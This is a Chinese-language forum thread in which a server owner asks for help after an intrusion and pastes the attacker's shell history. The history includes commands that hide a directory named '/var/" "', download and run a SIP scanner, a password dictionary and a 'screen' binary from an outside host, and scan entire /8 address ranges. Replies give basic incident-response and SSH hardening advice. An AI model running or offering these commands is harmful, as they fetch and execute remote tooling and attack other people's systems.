linux被黑，请高手支招。

zhanghuiwo

我一台服务器被黑，关掉了ssh端口，还是被建立用户。扫描外网。请高手们帮我支招，不知道，是从何进来的？root密码也设置的很复杂。

执行了这些命令w
exit
cd /var/" "/si/res
ls
cd /home
ls
cd htpp
ls
cd httpd/
ls
cd /var/" "
cd /var/" "
ls
mkdir /var/" " ; cd /var/" " ; wget  http://rip-is-my.name/rip/sipscan7.1.tgz ; tar zxvf sipscan7.1.tgz ; cd sipscan7.1 ; ./install ; rm -rf dictionar ; wget  http://rip-is-my.name/rip/no.txt ; mv no.txt dictionar ; chmod +x dictionar ;
screen
apt-get
wget  http://rip-is-my.name/rip/screen ; chmod +x screen ; ./screen
top
ps x
screen -r
./screen
ps x
exit
./scan 78.0.0.0/8
./scan 79.0.0.0/8
cd /var/\ /sipscan7.1/results/
ls
cat *
rm -rf *
cd ..
screen -r
./screen -r
killall -9 screen
./screen -wipe
./screen
./screen
exit

taojie2000

入侵的 又利用啥漏洞 获得root权限了

c2shield

应该是直接root进来的，楼主太不小心了……

zhanghuiwo

密码是复杂密码，上面有web服务，就是不知道从何进来的。帮忙支招一下。

taojie2000

回复 4# zhanghuiwo


    多看看系统里的各个日志

    入侵方式太多,利用系统漏洞,服务漏洞,等等.....

jihaiming

别是内部人干的

zhanghuiwo

应该不会吧？密码很少有人知道啊。我刚刚看了一下日志，老是有人扫描我的root密码，有可能是被破解了。不过有一点，我很奇怪，自上次被攻击过后，我关了22端口发布，怎么还能通过外网扫描22端口？且还被破解了？确实有点怪异。

mxiaohua1768

跟你闹着玩呢~

lijichao

LZ你以后连SSH要用证书不要用密码！！

zhanghuiwo

查了一系统，文件还是没有被修改过，find / -mtime -2.只有/var/‘ ’，此目录有修改，不过我删除了。密码已经修改。ssh端口也已经修改。今天看情况，比较稳定，先观察几天看看。